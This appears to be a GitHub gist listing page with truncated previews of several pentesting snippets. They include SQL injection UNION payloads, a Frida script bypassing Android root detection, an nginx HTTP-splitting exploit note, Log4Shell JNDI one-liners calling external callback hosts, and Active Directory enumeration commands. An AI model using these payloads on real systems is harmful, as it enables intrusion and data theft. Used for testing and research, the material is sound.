This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Java.perform(() => { | |
var inc = 0; | |
function waitForLibrary(name, callback) { | |
var lib = null; | |
var interval = setInterval(() => { | |
try { | |
lib = Module.ensureInitialized(name); | |
console.log(`[+] ${name} is loaded`); | |
clearInterval(interval); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
unbind C-b | |
set-option -g prefix C-a | |
bind-key C-a send-prefix | |
bind | split-window -h | |
bind - split-window -v | |
unbind '"' | |
unbind % | |
bind r source-file ~/.tmux.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
`-=[SQL injection Queries]=- | |
HOW TO SUCCESSFULLY INJECTING SQL INJECTION | |
[~] after id no. like id=1 +/*!and*/+1=0 [~] | |
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5 | |
+div+0 | |
+div false | |
+Having+1=0+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import socket | |
import sys | |
import random | |
import string | |
banner=""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import re | |
import random | |
import string | |
import socket | |
import time | |
proxies={"http":"127.0.0.1:8080"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import re | |
import random | |
import string | |
banner=""" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PT Reverse Proxy | |
## Exploiting HTTP Splitting with cloud storage | |
location ~ /docs/([^/]*/[^/]*)? { | |
proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Log4Shell Some Proved Testing Methods | |
# Oneliner 1: | |
$ cat vulnerable-hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' >> L4SFuzzList | |
$ httpx -l L4SFuzzList | |
#Oneliner 2: | |
$ cat 1.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}";done (Credit:https://twitter.com/HackerGautam/status/1469751218926882816) | |
# The Great resource to learn and earn: | |
https://github.com/pentesterland/Log4Shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Enumeration | |
# Credential Injection | |
runas.exe /netonly /user:<domain>\<username> cmd.exe | |
# enumeration users | |
users | |
net user /domain |
NewerOlder